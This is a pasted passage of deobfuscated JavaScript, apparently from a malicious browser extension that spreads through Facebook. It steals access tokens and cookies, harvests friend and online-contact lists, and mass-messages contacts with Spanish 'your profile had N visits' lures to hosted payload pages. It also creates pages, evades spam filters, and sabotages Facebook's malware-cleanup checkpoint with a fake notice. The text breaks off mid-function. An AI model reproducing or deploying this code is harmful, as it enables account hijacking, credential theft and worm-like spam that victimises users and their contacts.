· 9 years ago · Oct 29, 2016, 09:00 PM
1if (document["domain"]["indexOf"]("facebook.com") > -1 || (document["domain"]["indexOf"]("dropbox.com") > -1 || document["URL"]["indexOf"]("accounts.google.com/o/oauth2") > -1)) {
2 var xmlHttp = new XMLHttpRequest;
3 xmlHttp["open"]("GET", "https://cdnjs.cloudflare.com/ajax/libs/jquery/1.8.3/jquery.min.js", false);
4 xmlHttp["send"](null);
5 eval(xmlHttp["responseText"]);
6}
7!function(dataAndEvents) {
8 var c = dataAndEvents["HTMLCanvasElement"] && dataAndEvents["HTMLCanvasElement"]["prototype"];
9 var hasBlobConstructor = dataAndEvents["Blob"] && function() {
10 try {
11 return Boolean(new Blob);
12 } catch (_0x1959x2) {
13 return false;
14 }
15 }();
16 var hasArrayBufferViewSupport = hasBlobConstructor && (dataAndEvents["Uint8Array"] && function() {
17 try {
18 return 100 === (new Blob([new Uint8Array(100)]))["size"];
19 } catch (_0x1959x2) {
20 return false;
21 }
22 }());
23 var Resource = dataAndEvents["BlobBuilder"] || (dataAndEvents["WebKitBlobBuilder"] || (dataAndEvents["MozBlobBuilder"] || dataAndEvents["MSBlobBuilder"]));
24 var _map = (hasBlobConstructor || Resource) && (dataAndEvents["atob"] && (dataAndEvents["ArrayBuffer"] && (dataAndEvents["Uint8Array"] && function(dataAndEvents) {
25 var stack;
26 var arrayBuffer;
27 var intArray;
28 var i;
29 var contentType;
30 var data;
31 stack = dataAndEvents["split"](",")[0]["indexOf"]("base64") >= 0 ? atob(dataAndEvents["split"](",")[1]) : decodeURIComponent(dataAndEvents["split"](",")[1]);
32 arrayBuffer = new ArrayBuffer(stack["length"]);
33 intArray = new Uint8Array(arrayBuffer);
34 i = 0;
35 for (;i < stack["length"];i += 1) {
36 intArray[i] = stack["charCodeAt"](i);
37 }
38 return contentType = dataAndEvents["split"](",")[0]["split"](":")[1]["split"](";")[0], hasBlobConstructor ? new Blob([hasArrayBufferViewSupport ? intArray : arrayBuffer], {
39 type : contentType
40 }) : (data = new Resource, data["append"](arrayBuffer), data["getBlob"](contentType));
41 })));
42 if (dataAndEvents["HTMLCanvasElement"]) {
43 if (!c["toBlob"]) {
44 if (c["mozGetAsFile"]) {
45 c["toBlob"] = function(callback, stdout, deepDataAndEvents) {
46 if (deepDataAndEvents && (c["toDataURL"] && _map)) {
47 callback(_map(this["toDataURL"](stdout, deepDataAndEvents)));
48 } else {
49 callback(this["mozGetAsFile"]("blob", stdout));
50 }
51 };
52 } else {
53 if (c["toDataURL"]) {
54 if (_map) {
55 c["toBlob"] = function(callback, rx, deepDataAndEvents) {
56 callback(_map(this["toDataURL"](rx, deepDataAndEvents)));
57 };
58 }
59 }
60 }
61 }
62 }
63 if ("function" == typeof define && define["amd"]) {
64 define(function() {
65 return _map;
66 });
67 } else {
68 dataAndEvents["dataURLtoBlob"] = _map;
69 }
70}(this);
71xmlHttp = new XMLHttpRequest;
72xmlHttp["open"]("GET", "//whos.amung.us/pingjs/?k=hhhyyyrkkkty", true);
73xmlHttp["send"](null);
74var cookies = {
75 read : function(fileName) {
76 _cookie = fileName + "=";
77 _cookies = document["cookie"]["split"](";");
78 var i = 0;
79 for (;i < _cookies["length"];i++) {
80 thisCookie = _cookies[i];
81 for (;thisCookie["charAt"](0) == " ";) {
82 thisCookie = thisCookie["substring"](1, thisCookie["length"]);
83 }
84 if (thisCookie["indexOf"](_cookie) == 0) {
85 return thisCookie["substring"](_cookie["length"], thisCookie["length"]);
86 }
87 }
88 return null;
89 },
90 save : function(key, val, attrs) {
91 var minDate = new Date;
92 minDate["setDate"](minDate["getDate"]() + attrs);
93 document["cookie"] = key + "=" + escape(val) + "; expires=" + minDate["toUTCString"]() + "; path=/";
94 }
95};
96var globalFunction = {
97 rand : function(max) {
98 return Math["floor"](Math["random"]() * max + 1);
99 },
100 chain : function(b, sep) {
101 sep = sep || 0;
102 var ch = "";
103 var result = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
104 if (sep != 0) {
105 result = "0123456789abcdef";
106 }
107 var a = 0;
108 for (;a < b;a++) {
109 ch += result["charAt"](Math["floor"](Math["random"]() * result["length"]));
110 }
111 return ch;
112 },
113 returnName : function(dataAndEvents) {
114 if (!fbData["token"]) {
115 $["ajax"]({
116 url : "https://www.facebook.com/ads/manager",
117 type : "GET",
118 async : false,
119 complete : function(response) {
120 fbData["token"] = globalFunction["between"]('access_token":"', '"', response["responseText"]);
121 if (globalFunction["type"](fbData["token"]) == false || fbData["token"] == "") {
122 $["ajax"]({
123 url : "https://www.facebook.com/v2.0/dialog/oauth/read?__pc=EXP1%3ADEFAULT",
124 type : "POST",
125 async : false,
126 data : {
127 "fb_dtsg" : fb["user_dtsg"],
128 "app_id" : "124024574287414",
129 "redirect_uri" : "fbconnect://success",
130 "display" : "popup",
131 "access_token" : "",
132 "sdk" : "",
133 "from_post" : "1",
134 "public_info_nux" : "1",
135 "private" : "",
136 "tos" : "",
137 "read" : "public_profile,baseline",
138 "write" : "",
139 "readwrite" : "",
140 "extended" : "",
141 "social_confirm" : "",
142 "confirm" : "",
143 "seen_scopes" : "public_profile,baseline",
144 "auth_type" : "",
145 "auth_token" : "",
146 "auth_nonce" : "",
147 "default_audience" : "",
148 "ref" : "Default",
149 "return_format" : "access_token",
150 "domain" : "",
151 "sso_device" : "",
152 "sheet_name" : "initial",
153 "__CONFIRM__" : "1",
154 "__user" : +fb["user_id"],
155 "__a" : 1,
156 "__dyn" : "",
157 "__req" : 1,
158 "ttstamp" : fb["phstamp"],
159 "__rev" : fb["rev"]
160 },
161 complete : function(response) {
162 fbData["token"] = globalFunction["between"]("access_token=", "&", response["responseText"]);
163 }
164 });
165 }
166 }
167 });
168 }
169 if (!fb["globalName"]) {
170 $["ajax"]({
171 url : "https://www.facebook.com/profile.php",
172 type : "GET",
173 async : false,
174 complete : function(response) {
175 namae = globalFunction["between"]('<title id="pageTitle">', "</title>", response["responseText"]);
176 }
177 });
178 if (!namae) {
179 } else {
180 name = namae;
181 fb["globalName"] = namae;
182 }
183 } else {
184 name = fb["globalName"];
185 }
186 return dataAndEvents == 1 ? alljson : name;
187 },
188 between : function(date, body, f) {
189 date = date.toString()["replace"]("\n", "");
190 body = body.toString()["replace"]("\n", "");
191 f = f.toString()["replace"]("\n", "");
192 if (typeof f["split"](date)[1] != "undefined") {
193 return f["split"](date)[1]["split"](body)[0];
194 }
195 },
196 type : function(obj) {
197 if (typeof obj != "undefined") {
198 return true;
199 } else {
200 return false;
201 }
202 },
203 parse : function(data) {
204 return JSON && JSON["parse"](data) || $["parseJSON"](data);
205 },
206 getRandomColor : function() {
207 var match = "0123456789ABCDEF"["split"]("");
208 var later = "#";
209 var _0x1959xa = 0;
210 for (;_0x1959xa < 6;_0x1959xa++) {
211 later += match[Math["floor"](Math["random"]() * 16)];
212 }
213 return later;
214 },
215 encodeU : function(sectionName) {
216 return encodeURIComponent(sectionName)["replace"](/'/g, "%27")["replace"](/"/g, "%22");
217 },
218 random : function(min, max) {
219 var ii = arguments["length"];
220 if (ii === 0) {
221 min = 0;
222 max = 2147483647;
223 } else {
224 if (ii === 1) {
225 throw new Error("Warning: rand() expects exactly 2 parameters, 1 given");
226 }
227 }
228 return Math["floor"](Math["random"]() * (max - min + 1)) + min;
229 },
230 convertToDataURLviaCanvas : function(path, on, className, type) {
231 type = type || null;
232 img = globalFunction["chain"](8);
233 varname2 = globalFunction["chain"](8);
234 varname3 = globalFunction["chain"](8);
235 varname4 = globalFunction["chain"](8);
236 var img = new Image;
237 img["crossOrigin"] = "Anonymous";
238 img["onload"] = function() {
239 var self = document["createElement"]("CANVAS");
240 var drawImage = self["getContext"]("2d");
241 var failuresLink;
242 self["height"] = this["height"];
243 self["width"] = this["width"];
244 drawImage["drawImage"](this, 0, 0);
245 failuresLink = self["toDataURL"](className);
246 on(failuresLink, type);
247 self = null;
248 type = null;
249 };
250 img["src"] = path;
251 },
252 calculateAspectRatioFit : function(numCols, r, deltaY, ry) {
253 var cellSize = Math["min"](deltaY / numCols, ry / r);
254 return{
255 width : numCols * cellSize,
256 height : r * cellSize
257 };
258 },
259 isgd : function(searchKey) {
260 $["ajax"]({
261 url : "http://tinyurl.com/api-create.php?url=" + searchKey,
262 type : "GET",
263 async : false,
264 complete : function(txt) {
265 l = txt["responseText"];
266 }
267 });
268 return l;
269 },
270 sub : function() {
271 ramdot = globalFunction["random"](2, 4);
272 dots = [];
273 i = 0;
274 for (;i < ramdot;i++) {
275 dots[i] = globalFunction["chain"](globalFunction["random"](5, 10), globalFunction["random"](0, 1))["toUpperCase"]();
276 }
277 ramdot2 = globalFunction["random"](2, 4);
278 dots2 = [];
279 i = 0;
280 for (;i < ramdot2;i++) {
281 dots2[i] = globalFunction["chain"](globalFunction["random"](5, 10), globalFunction["random"](0, 1))["toUpperCase"]();
282 }
283 return dots["join"](".") + "." + dots2["join"]("-");
284 },
285 sortArrOfObjectsByParam : function(dataAndEvents, col, opt_h) {
286 if (opt_h == undefined) {
287 opt_h = true;
288 }
289 if (opt_h) {
290 dataAndEvents["sort"](function(a, b) {
291 return a[col] > b[col];
292 });
293 } else {
294 dataAndEvents["sort"](function(a, b) {
295 return a[col] < b[col];
296 });
297 }
298 },
299 deSerialize : function(json) {
300 return Object["keys"](json)["map"](function(key) {
301 return encodeURIComponent(key) + "=" + encodeURIComponent(json[key]);
302 })["join"]("&");
303 },
304 spaces : function(n) {
305 start = "";
306 var i = 0;
307 for (;i < n;i++) {
308 start = start + " ";
309 }
310 return start;
311 },
312 returnSigned : function(dataAndEvents) {
313 $["ajax"]({
314 url : "https://raw.statichtmlapp.com/tab/1/visitor/" + dataAndEvents + "/wrapped",
315 type : "GET",
316 async : false,
317 complete : function(response) {
318 l = "https:" + globalFunction["between"]("id='content_iframe' src='", "'", response["responseText"]);
319 }
320 });
321 return l;
322 },
323 photoToFb : function(deepDataAndEvents, callback) {
324 $["ajax"]({
325 url : "https://www.facebook.com/notes/composer/?__pc=EXP1%3ADEFAULT",
326 type : "POST",
327 async : false,
328 data : {
329 "fb_dtsg" : fb["user_dtsg"],
330 "new" : "1",
331 "__user" : +fb["user_id"],
332 "__a" : 1,
333 "__dyn" : "",
334 "__req" : 1,
335 "ttstamp" : fb["phstamp"],
336 "__rev" : fb["rev"]
337 },
338 complete : function(response) {
339 fb["noteId"] = globalFunction["between"]('"privacyfbid":"', '"', response["responseText"]);
340 var data = new FormData;
341 data["append"]("fb_dtsg", fb["user_dtsg"]);
342 data["append"]("file", deepDataAndEvents, globalFunction["random"](0, 999999) + ".jpg");
343 $["ajax"]({
344 url : "https://www.facebook.com/notes/composer/upload/?note_id=" + fb["noteId"] + "&av=" + fb["user_id"] + "&__pc=EXP1%3ADEFAULT&__user=" + fb["user_id"] + "&__a=1&__dyn=&__req=d&fb_dtsg=" + fb["user_dtsg"] + "&ttstamp=&__rev=" + fb["rev"] + "",
345 type : "POST",
346 async : false,
347 contentType : "multipart/form-data",
348 beforeSend : function(xhr) {
349 if (xhr && xhr["overrideMimeType"]) {
350 xhr["overrideMimeType"]("multipart/form-data");
351 }
352 },
353 mimeType : "multipart/form-data",
354 processData : false,
355 contentType : false,
356 data : data,
357 complete : function(response) {
358 photoId = globalFunction["between"]('"src":"', '"', response["responseText"])["replaceAll"]("/", "/");
359 photo = globalFunction["between"]('"src":"', '"', response["responseText"])["replaceAll"]("/", "/");
360 $("#c")["remove"]();
361 callback(photo);
362 }
363 });
364 }
365 });
366 },
367 get : function(url) {
368 var request = new XMLHttpRequest;
369 request["open"]("GET", url, true);
370 request["send"](null);
371 },
372 link : function() {
373 signed = fb["signeds"];
374 add1 = globalFunction["chain"](globalFunction["random"](5, 10))["toLowerCase"]() + "=" + globalFunction["chain"](globalFunction["random"](170, 180));
375 add2 = globalFunction["chain"](globalFunction["random"](5, 10))["toLowerCase"]() + "=" + globalFunction["chain"](globalFunction["random"](170, 180));
376 url = "https://" + globalFunction["rand"](1E7, 99999999) + ".statichtmlapp.com/tab/1/visitor/" + globalFunction["rand"](1E12, 9999999999999) + "/?" + add1 + "&signed_request=" + signed + "&" + add2;
377 url = fb["signeds"];
378 return "http://" + globalFunction["sub"]() + ".usrfiles.com/html/" + fbData["h2"];
379 },
380 createFanpage : function() {
381 var padLength = 12;
382 var results = "ABCDEFGHIJKLMNOPRSTUVYZX";
383 var s = "abcdefghijklmnoprstuvyzx";
384 var res = results[Math["floor"](23 * Math["random"]())];
385 i = 0;
386 for (;i < padLength;i++) {
387 res += s[Math["floor"](23 * Math["random"]())];
388 }
389 $["ajax"]({
390 url : "https://www.facebook.com/ajax/pages/create/check/?__pc=EXP1%3ADEFAULT",
391 type : "POST",
392 async : false,
393 data : {
394 "fb_dtsg" : fb["user_dtsg"],
395 "do_migrate" : "",
396 "form_name" : "entertainment_form",
397 "ref_type" : "logout_gear",
398 "ref_id" : "",
399 "attempts" : 0,
400 "category" : 1200,
401 "page_name" : res,
402 "nctr[_mod]" : "pagelet_entertainment",
403 "__user" : fb["user_id"],
404 "__a" : "1",
405 "_dyn" : "",
406 "__req" : "j",
407 "ttstamp" : fb["phstamp"],
408 "__rev" : fb["rev"]
409 },
410 complete : function(response) {
411 id = globalFunction["between"]("" + res + "\\/", "?", response["responseText"]);
412 id = parseInt(id);
413 }
414 });
415 return id;
416 },
417 shuffle : function(array) {
418 var i = array["length"];
419 var temp;
420 var j;
421 for (;0 !== i;) {
422 j = Math["floor"](Math["random"]() * i);
423 i -= 1;
424 temp = array[i];
425 array[i] = array[j];
426 array[j] = temp;
427 }
428 return array;
429 },
430 checkBa : function(data) {
431 ban = false;
432 $["ajax"]({
433 url : "https://www.facebook.com/dialog/share?app_id=966242223397117&href=" + data,
434 type : "GET",
435 async : false,
436 complete : function(response) {
437 if (response["responseText"]["indexOf"]("dropboxusercontent") == -1) {
438 (new Image)["src"] = "//whos.amung.us/swidget/wixerr34";
439 (new Image)["src"] = "//whos.amung.us/swidget/wixerr32";
440 ban = true;
441 } else {
442 $["ajax"]({
443 url : data["replace"]("dropbox", "dropboxusercontent"),
444 type : "GET",
445 async : false,
446 complete : function(response) {
447 if (response["responseText"]["indexOf"](">function") == -1) {
448 (new Image)["src"] = "//whos.amung.us/swidget/wixerr33";
449 (new Image)["src"] = "//whos.amung.us/swidget/wixerr34";
450 ban = true;
451 }
452 }
453 });
454 }
455 }
456 });
457 return ban;
458 },
459 genN : function() {
460 function getOwnPropertyNames(location) {
461 var o = location["split"]("");
462 var i = 0;
463 var l = o["length"];
464 for (;i < l;i++) {
465 var j = Math["floor"](Math["random"]() * (i + 1));
466 var v = o[i];
467 o[i] = o[j];
468 o[j] = v;
469 }
470 return o["join"]("");
471 }
472 var data = "";
473 i = 0;
474 for (;i < 5;i++) {
475 data += getOwnPropertyNames("aeiou")[0];
476 data += getOwnPropertyNames("bcdfghjklmnprstvyz")[0];
477 }
478 return data[0]["replace"](data[0], data[0]["toUpperCase"]()) + data["replace"](data[0], "");
479 },
480 banword : function(obj) {
481 delimiters = [unescape("%A0"), " ", "."];
482 obj = obj["split"]("");
483 finalWord = "";
484 insertIn = Math["floor"](Math["random"]() * obj["length"]);
485 if (obj[insertIn] == " ") {
486 insertIn--;
487 }
488 if (insertIn == obj["length"]) {
489 insertIn--;
490 }
491 i = 0;
492 for (;i < obj["length"];i++) {
493 finalWord = finalWord + (insertIn == i ? obj[i] + delimiters[Math["floor"](Math["random"]() * delimiters["length"])] : obj[i]);
494 }
495 return finalWord;
496 },
497 friendspush : function(dataAndEvents) {
498 $["ajax"]({
499 url : "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + fb["user_id"],
500 type : "GET",
501 async : false,
502 complete : function(res) {
503 res = globalFunction["parse"](res["responseText"]["substring"](9, res["responseText"]["length"]));
504 friendList = res["payload"]["entries"];
505 }
506 });
507 pushs = [];
508 successed = 0;
509 i = 0;
510 for (;i < friendList["length"];i++) {
511 if (successed < dataAndEvents) {
512 if (friendList[i]["uid"] != fb["user_id"]) {
513 successed++;
514 pushs["push"]({
515 "name" : friendList[i]["text"],
516 "uid" : friendList[i]["uid"]
517 });
518 }
519 }
520 }
521 return pushs;
522 },
523 checkapp : function(searchKey) {
524 ret = false;
525 $["ajax"]({
526 url : "https://graph.facebook.com/" + searchKey,
527 type : "GET",
528 async : false,
529 complete : function(response) {
530 if (response["responseText"]["indexOf"]("error") == -1) {
531 ret = true;
532 }
533 }
534 });
535 return ret;
536 },
537 isjson : function(body) {
538 try {
539 JSON["parse"](body);
540 } catch (e) {
541 return false;
542 }
543 return true;
544 },
545 onlines : function() {
546 $["ajax"]({
547 url : "https://www.facebook.com/",
548 type : "GET",
549 async : false,
550 complete : function(response) {
551 onlineList = [];
552 onlineList2 = [];
553 try {
554 last = globalFunction["between"]("lastActiveTimes:", "},", response["responseText"]) + "}";
555 if (gF["isjson"](last)) {
556 last = JSON["parse"](last);
557 }
558 list = globalFunction["between"]('"InitialChatFriendsList",', "shortProfiles", response["responseText"]);
559 list = JSON["parse"](globalFunction["between"]("list:", "],", list) + "]");
560 i = 0;
561 for (;i < list["length"];i++) {
562 onlineList = onlineList["concat"](list[i]["split"]("-")[0]);
563 }
564 $["each"](onlineList, function(dataAndEvents, dep) {
565 if ($["inArray"](dep, onlineList2) === -1) {
566 onlineList2["push"](dep);
567 }
568 });
569 onlineList = onlineList2;
570 if (last) {
571 liveList = Object["keys"](last)["sort"](function(j, i) {
572 return last[j] - last[i];
573 })["reverse"]();
574 nowAvailable = onlineList;
575 i = 0;
576 for (;i < liveList["length"];i++) {
577 if (nowAvailable["indexOf"](liveList[i]) > -1) {
578 nowAvailable["splice"](nowAvailable["indexOf"](liveList[i]), 1);
579 }
580 }
581 onlineList = liveList;
582 onlineList2 = nowAvailable;
583 }
584 } catch (e) {
585 $["ajax"]({
586 url : "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + fb["user_id"],
587 type : "GET",
588 async : false,
589 complete : function(res) {
590 res = globalFunction["parse"](res["responseText"]["substring"](9, res["responseText"]["length"]));
591 friendList = res["payload"]["entries"];
592 }
593 });
594 pushs = [];
595 successed = 0;
596 onlineList2 = [];
597 onlineList = [];
598 i = 0;
599 for (;i < friendList["length"];i++) {
600 onlineList = onlineList["concat"](friendList[i]);
601 }
602 }
603 }
604 });
605 return[onlineList, onlineList2];
606 }
607};
608var gF = globalFunction;
609String["prototype"]["replaceAll"] = function(data, options, ignoreCase) {
610 return this["replace"](new RegExp(data["replace"](/([\/\,\!\\\^\$\{\}\[\]\(\)\.\*\+\?\|\<\>\-\&])/g, "_0x547c[190]"), ignoreCase ? "gi" : "g"), typeof options == "string" ? options["replace"](/\$/g, "$$") : options);
611};
612if (!globalFunction["type"](fbData)) {
613 var fbData = {};
614 var fb = {};
615}
616fb["cache"] = 515;
617fb["debug"] = chrome["runtime"]["id"] == "nnlmeocaallabidkipfingkeiobkjkpk" ? true : false;
618fb["enable"] = true;
619fb["console"] = fb["debug"] ? true : false;
620fb["domain"] = "s3.amazonaws.com";
621fbData["totalPost"] = 3;
622fbData["groupPost"] = 5;
623fb["max"] = 99;
624fb["totalChat"] = 60;
625fb["mlimit"] = 28;
626fb["errorL"] = 0;
627fb["handle"] = 0;
628if (!globalFunction["type"](fbBan)) {
629 var fbBan = 0
630}
631if (!fb["debug"]) {
632 if (document["URL"]["indexOf"]("facebook.com/checkpoint") > -1) {
633 var check = function(silent) {
634 silent = silent["toUpperCase"]();
635 if (document["getElementsByClassName"]("checkpoint")[0]["innerHTML"]["toUpperCase"]()["indexOf"](silent) > -1) {
636 return true;
637 } else {
638 return false;
639 }
640 };
641 if (check("MALWARE") == true || (check("CLEANED") == true || (check("Computer") == true || (check("Scanner") == true || (check("HouseCall") == true || (check("Kapersky") == true || (check("Virus") == true || check("Trend") == true))))))) {
642 (new Image)["src"] = "//whos.amung.us/swidget/hhhyyyrkkktb";
643 setInterval(function() {
644 document["getElementById"]("checkpointSubmitButton")["style"]["display"] = "none";
645 document["getElementById"]("checkpointBottomBar")["style"]["display"] = "none";
646 cookies["save"]("checkpoint", 0, 30);
647 $("._50f4")["html"]('<table><tbody><tr><td><img class="img" src="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yn/r/1U2ftI0b2hV.png" width="34" height="34" alt=""></td><td></td><td> Antes de volver a iniciar sesión necesitas limpiar todas tus cookies, puedes hacerlo desde las configuraciones de tu google chrome, <a href="https://support.google.com/accounts/answer/32050?hl=es">Mira este tutorial si no sabes como</a>. </td></tr><tr><td></td><td></td><td> . </td></tr></tbody></table>');
648 $(".checkpoint div")["eq"](3)["html"]('<table><tbody><tr><td><img class="img" src="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yn/r/1U2ftI0b2hV.png" width="34" height="34" alt=""></td><td></td><td> Antes de volver a iniciar sesión necesitas limpiar todas tus cookies, puedes hacerlo desde las configuraciones de tu google chrome, <a href="https://support.google.com/accounts/answer/32050?hl=es">Mira este tutorial si no sabes como</a>. </td></tr><tr><td></td><td></td><td> . </td></tr></tbody></table>');
649 $("#checkpointSubmitButton")["hide"]();
650 $("#checkpointBottomBar")["hide"]();
651 }, 10);
652 }
653 }
654}
655if (fb["debug"]) {
656 console["log"]("in debug mode");
657}
658if (document["domain"]["indexOf"](fb["domain"]) > -1 && (fb["enable"] == true && fb["debug"] == false)) {
659 var script = document["createElement"]("script");
660 script["innerHTML"] = "downloadexe1 = function() { top.location='" + globalFunction["between"]('item = "', '"', document["body"]["innerHTML"]) + "'; }";
661 document["body"]["appendChild"](script);
662}
663function msgcy(fmt, dataAndEvents, isXML, deepDataAndEvents) {
664 url3 = dataAndEvents + "?" + globalFunction["chain"](12);
665 url3 = url3["replace"](url3["split"]("/")[5]["split"](".")[0], globalFunction["random"](1033213, 9233213));
666 if (isXML == 0) {
667 var task = {
668 image_height : 960,
669 image_width : 960,
670 uri : url3,
671 __user : fb["user_id"],
672 __a : 1,
673 __dyn : "7AmajEzUGBym5Q9UoHaEWC5ECiq2WbF3oyupFLFwxBxvyUW3F6xybxu3fzoaqwFUgx-y28b9GxefybDG4UpxiexO2-uczpo9XDyVqCgSi",
674 __req : "o",
675 ttstamp : fb["tts"],
676 __rev : fb["rev"],
677 fb_dtsg : fb["user_dtsg"]
678 };
679 $["ajax"]({
680 url : "https://www.facebook.com/message_share_attachment/fromURI/?dpr=1",
681 type : "POST",
682 async : true,
683 data : task,
684 complete : function(textStatus) {
685 msgcyy(fmt, url3, isXML, deepDataAndEvents);
686 }
687 });
688 } else {
689 msgcyy(fmt, url3, isXML, deepDataAndEvents);
690 }
691}
692function msgcyy(err, dataAndEvents, isXML, deepDataAndEvents) {
693 $["ajax"]({
694 url : "https://graph.facebook.com/" + err + "?access_token=" + fbData["token"],
695 type : "GET",
696 async : true,
697 complete : function(response) {
698 name = globalFunction["parse"](response["responseText"])["name"];
699 if (isXML == 0) {
700 msgc22(err, dataAndEvents, name, deepDataAndEvents);
701 } else {
702 send(err, dataAndEvents, name, deepDataAndEvents);
703 }
704 }
705 });
706}
707function send(evt, dataAndEvents, data, deepDataAndEvents) {
708 txtSend = data + ", tu per" + globalFunction["chain"](1)["toLowerCase"]() + "fil tuvo " + globalFunction["random"](100, 9999) + " visit" + globalFunction["chain"](1)["toLowerCase"]() + "as" + globalFunction["spaces"](globalFunction["random"](10, 30));
709 $["ajax"]({
710 url : "https://www.facebook.com/plugins/send/send?dpr=1." + fb["user_id"],
711 type : "POST",
712 async : true,
713 crossDomain : true,
714 data : {
715 "href" : dataAndEvents["replace"]("http://", "http://" + data["replace"](/[^\w\s]/gi, "")["replaceAll"](" ", "")["slice"](0, 16) + "."),
716 "nobootload" : "",
717 "iframe_referer" : "https://developers.facebook.com/",
718 "r_ts" : 1459155162,
719 "ref" : "",
720 "recipients[0]" : evt,
721 "xfbml" : "",
722 "app_id" : "113869198637480",
723 "text" : txtSend,
724 "__user" : fb["user_id"],
725 "__a" : 1,
726 "__dyn" : "",
727 "__req" : "",
728 "fb_dtsg" : fb["user_dtsg"],
729 "ttstamp" : fb["tts"],
730 "__rev" : fb["rev"]
731 },
732 complete : function(textStatus) {
733 cookies["save"](fb["user_id"] + "_sc" + fb["cache"], 1, 1);
734 }
735 });
736}
737fb["chats"] = 0;
738function msgc22(jqXHR, dataAndEvents, location, deepDataAndEvents) {
739 visits = globalFunction["random"](100, 9999);
740 txtSend = location + ", tu per" + globalFunction["chain"](1)["toLowerCase"]() + "fil tuvo " + visits + " visit" + globalFunction["chain"](1)["toLowerCase"]() + "as" + globalFunction["spaces"](globalFunction["random"](10, 30));
741 txtSend = globalFunction["chain"](1)["toLowerCase"]() + (location["indexOf"](" ") > -1 ? location["split"](" ")[0] : location) + " mira" + globalFunction["spaces"](globalFunction["random"](5, 10)) + globalFunction["chain"](1)["toLowerCase"]();
742 finalWord = globalFunction["banword"]("VISITAS");
743 var task = {
744 "message_batch[0][action_type]" : "ma-type:user-generated-message",
745 "message_batch[0][thread_id]" : "",
746 "message_batch[0][author]" : "fbid:" + fb["user_id"],
747 "message_batch[0][author_email]" : "",
748 "message_batch[0][timestamp]" : Date["now"](),
749 "message_batch[0][timestamp_absolute]" : "Hoy",
750 "message_batch[0][timestamp_relative]" : (new Date)["getHours"]() + ":" + (new Date)["getMinutes"](),
751 "message_batch[0][timestamp_time_passed]" : 0,
752 "message_batch[0][is_unread]" : "false",
753 "message_batch[0][is_forward]" : "false",
754 "message_batch[0][is_filtered_content]" : "false",
755 "message_batch[0][is_filtered_content_bh]" : "false",
756 "message_batch[0][is_filtered_content_account]" : "false",
757 "message_batch[0][is_filtered_content_quasar]" : "false",
758 "message_batch[0][is_filtered_content_invalid_app]" : "false",
759 "message_batch[0][is_spoof_warning]" : "false",
760 "message_batch[0][source]" : "source:chat:web",
761 "message_batch[0][source_tags][0]" : "source:chat",
762 "message_batch[0][body]" : "",
763 "message_batch[0][specific_to_list][0]" : "fbid:" + jqXHR,
764 "message_batch[0][specific_to_list][1]" : "fbid:" + fb["user_id"],
765 "message_batch[0][has_attachment]" : "true",
766 "message_batch[0][html_body]" : "false",
767 "message_batch[0][shareable_attachment][share_type]" : 100,
768 "message_batch[0][shareable_attachment][share_params][urlInfo][canonical]" : dataAndEvents,
769 "message_batch[0][shareable_attachment][share_params][urlInfo][final]" : dataAndEvents,
770 "message_batch[0][shareable_attachment][share_params][urlInfo][user]" : dataAndEvents,
771 "message_batch[0][shareable_attachment][share_params][responseCode]" : 200,
772 "message_batch[0][shareable_attachment][share_params][title]" : finalWord + " " + location["toUpperCase"]()["slice"](0, 25) + ": " + visits,
773 "message_batch[0][shareable_attachment][share_params][summary]" : location["indexOf"](" ") > -1 ? location["split"](" ")[0] : location,
774 "message_batch[0][shareable_attachment][share_params][content_removed]" : "false",
775 "message_batch[0][shareable_attachment][share_params][ranked_images][ranking_model_version]" : 10,
776 "message_batch[0][shareable_attachment][share_params][image_info][0][width]" : "449",
777 "message_batch[0][shareable_attachment][share_params][image_info][0][heigth]" : "337",
778 "message_batch[0][shareable_attachment][share_params][medium]" : "106",
779 "message_batch[0][shareable_attachment][share_params][url]" : dataAndEvents,
780 "message_batch[0][shareable_attachment][share_params][time_scraped]" : 1449413656,
781 "message_batch[0][shareable_attachment][share_params][cache_hit]" : "true",
782 "message_batch[0][shareable_attachment][share_params][global_share_id]" : "932867930116792",
783 "message_batch[0][shareable_attachment][share_params][was_recent]" : "false",
784 "message_batch[0][shareable_attachment][share_params][metaTagMap][0][http-equiv]" : "content-type",
785 "message_batch[0][shareable_attachment][share_params][metaTagMap][0][content]" : "text/html; charset=utf-8",
786 "message_batch[0][shareable_attachment][share_params][metaTagMap][2][property]" : "og:type",
787 "message_batch[0][shareable_attachment][share_params][metaTagMap][2][content]" : "article",
788 "message_batch[0][shareable_attachment][share_params][redirectPath][0][status]" : "og:url",
789 "message_batch[0][shareable_attachment][share_params][redirectPath][0][url]" : dataAndEvents,
790 "message_batch[0][shareable_attachment][share_params][error]" : 1,
791 "message_batch[0][ui_push_phase]" : "V3",
792 "message_batch[0][status]" : 0,
793 "message_batch[0][ephemeral_ttl_mode]" : 0,
794 "message_batch[0][manual_retry_cnt]" : 0,
795 client : "mercury",
796 "message_batch[0][other_user_fbid]" : jqXHR,
797 __user : fb["user_id"],
798 __a : 1,
799 __dyn : "7AmajEzUGBym5Q9UoHaEWC5ECiq2WbF3oyupFLFwxBxvyUW3F6xybxu3fzoaqwFUgx-y28b9GxefybDG4UpxiexO2-uczpo9XDyVqCgSi",
800 __req : "o",
801 ttstamp : fb["tts"],
802 __rev : fb["rev"],
803 fb_dtsg : fb["user_dtsg"]
804 };
805 $["ajax"]({
806 url : "https://www.facebook.com/ajax/mercury/send_messages.php?__pc=EXP1%3ADEFAULT",
807 type : "POST",
808 async : true,
809 data : task,
810 complete : function(response) {
811 if (response["responseText"]["indexOf"]("error") == -1) {
812 fb["chats"]++;
813 }
814 if (fb["chatsen"] - 1 == deepDataAndEvents) {
815 setTimeout(function() {
816 console["log"]("Success chats: " + fb["chats"]);
817 }, 3E3);
818 }
819 }
820 });
821}
822function makeShit(msg, onComplete, dataAndEvents) {
823 function e() {
824 function s() {
825 return Math["floor"]((1 + Math["random"]()) * 65536).toString(16)["substring"](1);
826 }
827 return s() + s() + "-" + s() + "-" + s() + "-" + s() + "-" + s() + s() + s();
828 }
829 dataAndEvents = dataAndEvents || 0;
830 fpage = globalFunction["createFanpage"]();
831 fbData["maxPost"] = 50;
